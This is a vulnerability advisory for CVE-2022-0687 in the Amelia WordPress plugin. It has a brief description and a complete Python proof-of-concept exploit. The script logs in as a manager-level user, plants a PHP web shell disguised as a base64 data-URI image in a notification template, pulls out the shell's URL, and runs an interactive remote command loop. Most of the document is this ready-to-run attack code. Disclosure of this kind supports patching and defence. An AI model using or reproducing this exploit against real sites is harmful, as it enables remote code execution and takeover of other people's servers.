Amelia < 1.0.46 – Manager+ RCE | CVE 2022-0687

Description

The plugin stores image blobs into actual files whose extension is controlled by the user, which may lead to PHP backdoors being uploaded onto the site. This vulnerability can be exploited by logged-in users with the custom "Amelia Manager" role.

Proof of Concept

import requests
import base64

BASE_URL = "http://localhost:8000"
id = "wordpress"
pw = "wordpress"

def login(id, pw) :
    sess = requests.Session()
    sess.post(
        BASE_URL + "/wp-login.php",
        data = {
            'log': id,
            'pwd': pw,
            'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8',
            'testcookie': '1'
        }
    ).text
    
    return sess

def exploit(sess) : 
    SHELLCODE = b"<?php echo(passthru($_POST['qerogram']));?>"

    payload = r'''{"id":1,"name":"customer_appointment_approved","customName":null,"status":"enabled","type":"email","entity":"appointment","time":null,"timeBefore":null,"timeAfter":null,"sendTo":"customer","subject":"%service_name% Appointment Approved",'''
    payload += r'''"content":"<p>Dear <strong><img src=\"data:image/php;,''' + base64.b64encode(SHELLCODE).decode() 
    payload += r'''\">%customer_full_name%</strong>,</p><p><br></p><p>You have successfully scheduled <strong>%service_name%</strong> appointment with <strong>%employee_full_name%</strong>. We are waiting you at <strong>%location_address% </strong>on <strong>%appointment_date_time%</strong>.</p><p><br></p><p>Thank you for choosing our company,</p><p><strong>%company_name%</strong></p>","translations":null,"entityIds":null,"sendOnlyMe":null}'''

    res = sess.post(
        f"{BASE_URL}/wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/1",
        data = payload,
        headers = {"Content-Type": "application/json;charset=UTF-8"}
    )

    SHELL_ADDR = res.json()['data']['notification']['content']
    SHELL_ADDR = SHELL_ADDR[SHELL_ADDR.find('src="')+5:]
    SHELL_ADDR = SHELL_ADDR[:SHELL_ADDR.find('"')]
    
    while True :
        cmd = input("$ ")
        if cmd.lower() == "exit" or cmd.lower() == "quit"  : 
            break

        res = sess.post(
            SHELL_ADDR,
            data = {"qerogram" : cmd}
        )
        print(res.text)


sess = login(id,pw)
exploit(sess)